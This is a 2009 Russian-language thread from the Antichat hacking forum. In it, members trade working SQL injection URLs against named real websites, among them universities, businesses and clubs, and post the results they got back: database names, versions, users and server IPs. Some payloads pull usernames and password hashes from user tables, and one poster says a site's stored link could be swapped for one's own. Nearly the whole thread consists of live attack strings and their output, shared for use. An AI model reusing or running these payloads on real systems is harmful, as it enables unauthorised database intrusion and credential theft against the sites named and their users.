HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.07.2009, 22:49
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Код:
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+30,1--
и т.д.
ЗЫ: Можно заменить линк любоко сайта на свой
Узнать можно так
Код:
WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pass,email)+from+users+where+uid=254--
Где UID номер зарегистрированного сайта

Последний раз редактировалось SeNaP; 19.07.2009 в 22:53..
 
Ответить с цитированием

  #2  
Старый 20.07.2009, 03:25
mol0t
Познающий
Регистрация: 08.07.2009
Сообщений: 43
С нами: 8864530

Репутация: 262
По умолчанию

Код:
http://www.factway.net/en/news.php?id=-9+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9--
factway_factway:5.0.81-community:factway_factway@localhost


Код:
http://www.oekoeffizienz.at/news.php?id=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10,11,12--
oekoeffizienz:5.0.32-Debian_7etch10-logeko@localhost


Код:
http://www.spcf.edu.ph/nextpage/news.php?t=1&id=-38+union+select+1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10--
spcfedup_spcfdbf:5.0.81-community:spcfedup@localhost
 
Ответить с цитированием

  #3  
Старый 20.07.2009, 05:41
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами: 9576027

Репутация: 173
По умолчанию

Код:
http://www.hendersonpartnersllp.ca/bios.php?id=-41+union+select+1,version(),3,4,5,6/*
Database Version: 5.0.45
Database name: royliu
User name: royliu@76.12.13.92
 
Ответить с цитированием

  #4  
Старый 20.07.2009, 09:41
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

делать было нефиг:
Цитата:
http://strelok-ohotnik.com.ua/news.php?action=one&id=13+union+select+1,2,concat_ ws(0x3a,username,user_password),4,5,6,7,8,9,10+fro m+phpbb_users+where+user_id=56--

http://www.kraina-z.com.ua/ua/news.php?id=22'+union+select+1,table_name,3,4,5+fr om+information_schema.tables+limit+100--%201

Последний раз редактировалось jokester; 20.07.2009 в 11:05.. Причина: kiosks.com.ua salve.com.ua iks.com.ua БОЯНЫ пароли
 
Ответить с цитированием

  #5  
Старый 20.07.2009, 12:34
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.facody.com/sat.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/*
Код:
facodycom@212.81.143.131:facodycom:5.0.27
 
Ответить с цитированием

  #6  
Старый 20.07.2009, 21:17
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

PR: 7

http://tv.jlu.edu.cn/v2/index.php?o=showc;id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5--

tvwing@localhost:tv:4.0.22-standard
 
Ответить с цитированием

  #7  
Старый 21.07.2009, 00:54
mol0t
Познающий
Регистрация: 08.07.2009
Сообщений: 43
С нами: 8864530

Репутация: 262
По умолчанию

FC milan
Код:
http://www.clubmilan.net/news.php?id=-484+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7--
CBMILAN_DB:5.0.81-COMMUNITY-LOG:CBMILAN_US@LOCALHOST


Matrix ебт
Код:
http://www.mxo.it/news.php?id=-60+union+select+concat_ws(0x3a,database(),version(),user())--
Sql12117_5:4.0.30-standard-log:Sql12117@62.149.141.22
 
Ответить с цитированием

  #8  
Старый 21.07.2009, 01:17
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию

[PR 6]
Код:
http://www.hellotourist.net/sajatlap.php?ID=-14227+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76_+CA+LA+SOMARA+Arzachena+Hotel
5.0.45-Debian_1ubuntu3.4-log:janositibor:janositibor@localhost
===================================
[PR 6]
Код:
http://www.jugglingdb.com/events/index.php?id=-7511+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18&lang=ca
5.0.27:ijdb:colin@localhost
===================================
[PR 4]
Код:
http://dev.4spe.org/cc/detail.php?id=-294+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
5.0.51a-3ubuntu5.1-log:spe:speweb@localhost
===================================
[PR 4]
Код:
http://www.cc-vw.org/index.php?id=974&level=-7+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--
5.0.45-log:sr0781254:sr0781254@81.31.99.12
===================================
[PR 3]
Код:
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
5.0.77-community:cc_blog:cc_php@localhost
Код:
http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+cc_blog.wp_users
===================================
[PR 0]
Код:
http://www.badlaav.co.cc/page.php?id=-19+union+select+1,2,concat_ws(0x3a,version(),database(),user())
5.0.81-community:mechier_badlaav:mechier_dbuser@localhost
 
Ответить с цитированием

  #9  
Старый 21.07.2009, 03:12
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
С нами: 9576027

Репутация: 173
По умолчанию

PR 6
Код:
http://www.rha.msu.edu/news.php?id=13+union+select+1,2,3,4,5,6,7,8,version(),0/*
Database Version: 5.0.44-log
Database name: rha
User name: rha@localhost
 
Ответить с цитированием

  #10  
Старый 21.07.2009, 09:19
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

http://www.hey-u.tv/detail/detail.php?nr=26&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47--

x000102w@localhost:x000102w:5.0.51a-Max

###################################
PR=5

скажите в чем прикол...+and+1=0 нужно что бы выдало результат мне ?? первый раз так подставляю

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,concat_WS(0x 3a,user(),database(),version()),3,4,5,6,7,8,9--

root@210.22.13.89:ipanel:5.0.26-standard-log

есть mysql.user

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,'p',3,4,5,6, 7,8,9+from+mysql.user--
result: p , MQ= off

tables:
Код:
BakVoucherHead,VoucherHead200008,Ledgers,VoucherMain200009,VoucherHead200004,CurrencySys,VoucherMain200005,VoucherHead199912,BankDiary,VoucherMain200001,ReceivableAge,BakVoucherMain,VoucherHead200009,Profit,VoucherMain200010,VoucherHead200005,Departments,VoucherMain200006,VoucherHead200001,Banks,VoucherMain200002,SysLog,BankBalanceAdjust,VoucherHead200010,ProfitX,VoucherHead200006,LedgerAbstract,VoucherMain200007,VoucherHead200002,CashBalanceAdjust,VoucherMain200003,Users,BankBursarAdjust,VoucherMain199911,QueryTempHead,AssetDebt,VoucherHead200007,LedgerBalance,VoucherMain200008,VoucherHead200003,CashDiary,VoucherMain200004,VoucherHead199911,BankCheck,VoucherMain199912,QueryTempMain,Groups,ImageGroups,Images,QueryTempHead,VoucherMain200002,LedgerBalance,VoucherHead200003,VoucherHead199911,QueryTempMain,VoucherMain200003,Ledgers,VoucherMain199911,VoucherHead199912,CashDiary,ReceivableAge,Profit,VoucherMain199912,Departments,VoucherHead200001,CountDetail_temp,SysLog,ProfitX,VoucherMain200001,LedgerAbstract,VoucherHead200002,CurrencySys,Users,viewFile,viewcont,linkBook,users,linkBook,users,viewFile,viewcont,contenttype,ReceivableAge,VoucherMain200008,CashDeal_back_8_29,VoucherHead200210,VoucherMain200108,VoucherHead200105,VoucherMain200106,VoucherHead200005_backup,ProfitX,VoucherMain200006,Banks,VoucherMain200209,VoucherHead200206,VoucherHead200101,VoucherMain200102,VoucherHead200003_backup,VoucherMain200004,LedgerBalance,VoucherMain200205,VoucherHead200202,BankBalanceAdjust,VoucherHead200010,VoucherMain200010_backup,VoucherHead200002,VoucherMain200002,DateTableRemark,VoucherMain200201,VoucherHead200110,BakVoucherHead,VoucherHead200008,SysLog,VoucherMain200008_backup,CashDeal_back_9_10,VoucherHead200211,VoucherMain200109,VoucherHead200106,VoucherHead200006,VoucherMain200107,QueryTempHead,VoucherMain200006_backup,CashBalanceAdjust,VoucherMain200210,VoucherHead200207,VoucherHead200102,VoucherMain200103,VoucherHead200004,VoucherMain200004_backup,LedgerBalance_backup,BankBursarAdjust,VoucherMain200206,VoucherHead200203,VoucherHead200010_backup,VoucherMain200011,VoucherHead200002_backup,VoucherMain200002_backup,Departments,Vouch
некоторые повторяются

####################################
PR=4

http://chamjb.eduhope.net/bbs/comment_write.php?board=chamjic-2&id=303&mode=modify&no=281+and+substring(version( ),1,1)=4--

Последний раз редактировалось HAXTA4OK; 21.07.2009 в 10:07..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.